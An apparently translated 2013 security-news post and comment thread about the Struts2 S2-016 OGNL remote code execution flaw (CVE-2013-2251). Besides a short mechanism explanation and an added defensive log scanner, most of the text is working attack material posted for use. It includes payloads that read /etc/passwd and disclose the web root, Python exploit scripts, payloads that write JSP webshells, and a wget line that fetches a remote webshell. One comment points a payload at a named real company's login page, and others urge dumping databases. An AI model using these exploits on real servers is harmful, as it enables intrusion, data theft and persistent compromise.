[Updated] Struts2 hit by another remote code execution vulnerability (S2-016)
phper 2013-07-17 | Vulnerabilities
Struts has another remote code execution vulnerability! With this one, an attacker can execute malicious code remotely by manipulating request parameters. In versions before Struts 2.3.15.1, the values following the action:, redirect: and redirectAction: parameter prefixes are not properly filtered, leading to OGNL code execution.
Description
Affected versions: Struts 2.0.0 - Struts 2.3.15
Reporter: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE ID: CVE-2013-2251
Proof of vulnerability
The parameter value is evaluated as an OGNL expression:
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
Code execution:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
Vulnerability mechanism
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
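As an added defender-side example (not from the original post or from Apache), here is a small Python scanner that flags access-log requests using the action:, redirect: or redirectAction: parameter prefixes described above and distinguishes those that carry an OGNL marker (${ or %{) after percent-decoding; the log lines, hosts and paths are constructed.

```python
import re
from urllib.parse import unquote, urlsplit
# Query parameter whose *name* carries a DefaultActionMapper navigation prefix;
# group 2 is the text after the colon that Struts before 2.3.15.1 evaluated.
PREFIX_RE = re.compile(r'(?:^|&)(redirectAction|redirect|action):([^&]*)', re.IGNORECASE)
OGNL_RE = re.compile(r'[$%]\{')  # OGNL expression markers: ${...} or %{...}
# Request target from an Apache/nginx combined-format access log line.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_repeatedly(s, rounds=3):
    """Percent-decode until stable, so %25{ (-> %{) and double encoding are seen."""
    for _ in range(rounds):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    return s

def classify_target(target):
    """'ognl' if a prefixed parameter carries an OGNL marker; 'prefix' if a
    navigation prefix appears with a plain target (as in the S2-017 probes
    quoted in the comments below); None for ordinary requests."""
    query = decode_repeatedly(urlsplit(target).query)
    verdict = None
    for m in PREFIX_RE.finditer(query):
        if OGNL_RE.search(m.group(2)):
            return 'ognl'
        verdict = 'prefix'
    return verdict

def scan_log(lines):
    """Yield (line_no, verdict, target) for every log line that trips a rule."""
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m and (verdict := classify_target(m.group(1))):
            yield n, verdict, m.group(1)

# Constructed sample log lines (not real traffic); hosts and paths are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jul/2013:10:01:02 +0800] "GET /struts2-blank/example/X.action?action:%25{3*4} HTTP/1.1" 200 512',
    '10.0.0.5 - - [17/Jul/2013:10:01:09 +0800] "GET /app/save.action?redirect%3A%24%7B%23a%3D1%7D HTTP/1.1" 302 0',
    '10.0.0.7 - - [17/Jul/2013:10:02:00 +0800] "GET /app/upload.action?redirect:http://example.org/ HTTP/1.1" 302 0',
    '10.0.0.9 - - [17/Jul/2013:10:03:00 +0800] "GET /app/list.action?page=2&sort=name HTTP/1.1" 200 2048',
]

if __name__ == '__main__':
    for n, verdict, target in scan_log(SAMPLE_LOG):
        print(f'line {n}: {verdict:6s} {target}')
```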
Official Apache advisory
Domestic websites are heavily affected.
The following is for teaching and research purposes only; illegal use is strictly prohibited!
Arbitrary command execution EXP, thanks to X for providing it:
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
Web root path disclosure EXP, thanks to h4ck0r for providing it:
?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
Python script for arbitrary command execution, thanks to h4ck0r for providing it:
import urllib2,sys,re

def get(url, data):
    # Append the payload as the query string and print the cleaned response body
    string = url + "?" + data
    req = urllib2.Request("%s"%string)
    response = urllib2.urlopen(req).read().strip()
    print strip(response)

def strip(str):
    # Remove the NUL bytes left over from the unused part of the char[50000] buffer
    tmp = str.strip()
    blank_line=re.compile('\x00')
    tmp=blank_line.sub('',tmp)
    return tmp

if __name__ == '__main__':
    url = sys.argv[1]
    cmd = sys.argv[2]
    cmd1 = sys.argv[3]
    attack="redirect:${%%23a%%3d(new%%20java.lang.ProcessBuilder(new%%20java.lang.String[]{'%s','%s'})).start(),%%23b%%3d%%23a.getInputStream(),%%23c%%3dnew%%20java.io.InputStreamReader(%%23b),%%23d%%3dnew%%20java.io.BufferedReader(%%23c),%%23e%%3dnew%%20char[50000],%%23d.read(%%23e),%%23matt%%3d%%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%%23matt.getWriter().println(%%23e),%%23matt.getWriter().flush(),%%23matt.getWriter().close()}"%(cmd,cmd1)
    get(url,attack)
GETSHELL EXP, thanks to coffee for providing it:
?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%
Then use the following code to write the shell:
Generates 1.jsp in the current directory
Comments (60)
生生不息 2013-07-17 #1
I bet exploit tools will be out in no time.
PoC from the official site:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.htm
.. Impressive, huh?
Likes: 6
fake 2013-07-17 #2
Wooyun has already started... black hats, go dump the databases...
Likes: 17
命运 2013-07-17 #3
不息 grabbed the first reply fast. Speaking of which, some idiots on Wooyun are farming points again. Such a great opportunity for the underground economy and they don't seize it, heh.
Likes: 27
n0bele (level 1) alert(document.cookie) 2013-07-17 #4
What a nice vendor; without it the black hats, and those who do both black-hat and white-hat work, could hardly keep their hats on.
Likes: 9
hackmissmiss (level 1) 2013-07-17 #5
Farm your mother's points. A bunch of kids hunting for websites to farm points just to satisfy their vanity. Idiots.
Likes: 25
蓝风 (level 1) 2013-07-17 #6
Young hero, remember to pull up your pants......
Likes: 1
mujj (level 1) 2013-07-17 #7
Has point farming started again?
Likes: 1
angellover08 (level 4) 2013-07-17 #8
I'd like to go into the underground economy, but I have no way in.
Likes: 2
z0mbie 2013-07-17 #9
I don't get it; could someone give a statement that executes a command?
Likes: 9
uj70ky7b (level 1) 2013-07-17 #10
Farm your sister's points, can you eat them? One point is worth tens of thousands, right?
Likes: 11
X 2013-07-17 #11
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
Likes: 40
yplinfo (level 1) 2013-07-17 #12
Sigh, only idiots farm points
Likes: 1
Cr0w 2013-07-17 #13
S2-17
http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/
http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23
Likes: 3
生生不息 2013-07-17 #14
https://kf.sf-express.com/css/loginmgmt/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}
Likes: 19
lock (Verified author, level 6, independent security researcher) 2013-07-17 #15
import urllib2,getopt,sys

def info():
    print "python struts.py -u http://baidu.com/test.action -d whoami"

def get(url, data):
    string = url + "?" + data
    req = urllib2.Request(string)
    response = urllib2.urlopen(req)
    print response.read()

if __name__ == '__main__':
    if len(sys.argv) < 2:
        info()
    try:
        opts, args = getopt.getopt(sys.argv[1:],"u:d:")
    except:
        sys.exit(2)
    for opt, value in opts:
        if opt == '-u':
            url = value
        elif opt == '-d':
            test = value
    # get() already prepends the "?", so the payload starts at redirect:
    attack="redirect:${#a=(new java.lang.ProcessBuilder('%s')).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}"%test
    get(url,attack)
Likes: 8
二手玫瑰 (level 1) 2013-07-17 #16
Could the experts please share a way to dump the site's absolute path....
Likes: 0
h4ck0r 2013-07-17 (reply)
@二手玫瑰 ?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
Likes: 1
pnig0s (Verified author, level 7, FreeBuf Technical Department secretary) 2013-07-17 #17
All the experts are showing their power in the comments :)
Likes: 0
元首 (level 2) 2013-07-17 #18
Path:
http://www.xxx.com/xxxx.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
Likes: 2
angellover08 (level 4) 2013-07-17 #19
FreeBuf has so many experts; I bow to you all.
Likes: 0
xiao_hen (level 4) "People cannot grow in happiness. Happiness only makes people shallow; we grow in pain, ..." 2013-07-17 #20
FreeBuf has so many experts; I bow to you all.
Likes: 0
dennych0u (level 1) 2013-07-17 #21
The poor engineers are going to be worked to death~
Likes: 0
z0mbie 2013-07-17 #22
Could the experts explain how to get a reverse shell and how to write a shell?
Likes: 0
河蟹是亲爱的 2013-07-17 #23
getshell
wget http://www.sss.com/data/avatar/test.txt -O /home/www/test.jsp
test.txt is the remote webshell, /home/www/test.jsp is the target path
Likes: 1
hackmissmiss (level 1) 2013-07-17 #24
How do you construct a WGET POC?
Likes: 0
free (level 1) 2013-07-17 #25
Looking for a tool
Likes: 0
h4ck0r 2013-07-17 #26
Execute arbitrary commands:
example: python test.py http://baidu.com/test.action cat /etc/passwd
import urllib2,sys,re

def get(url, data):
    string = url + "?" + data
    req = urllib2.Request("%s"%string)
    response = urllib2.urlopen(req).read().strip()
    print strip(response)

def strip(str):
    tmp = str.strip()
    blank_line=re.compile('\x00')
    tmp=blank_line.sub('',tmp)
    return tmp

if __name__ == '__main__':
    url = sys.argv[1]
    cmd = sys.argv[2]
    cmd1 = sys.argv[3]
    attack="redirect:${%%23a%%3d(new%%20java.lang.ProcessBuilder(new%%20java.lang.String[]{'%s','%s'})).start(),%%23b%%3d%%23a.getInputStream(),%%23c%%3dnew%%20java.io.InputStreamReader(%%23b),%%23d%%3dnew%%20java.io.BufferedReader(%%23c),%%23e%%3dnew%%20char[50000],%%23d.read(%%23e),%%23matt%%3d%%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%%23matt.getWriter().println(%%23e),%%23matt.getWriter().flush(),%%23matt.getWriter().close()}"%(cmd,cmd1)
    get(url,attack)
Likes: 2
Hell0w0rld 2013-07-17 (reply)
@h4ck0r IndentationError: expected an indented block
Likes: 0
coffee 2013-07-17 #27
Here is one that writes a shell; it generates test.jsp in the current directory
?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
Then use the following code to write the shell:
Generates 1.jsp in the current directory
Likes: 4
apo 2013-07-18 (reply)
@coffee Here is one that writes a shell; it generates test.jsp in the current directory
?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
Then use the following code to write the shell:
Generates 1.jsp in the current directory
Missing a name=t
Likes: 2
window 2013-07-18 (reply)
@apo It can generate test.jsp but not 1.jsp!
Likes: 0
apo 2013-07-18 (reply)
@window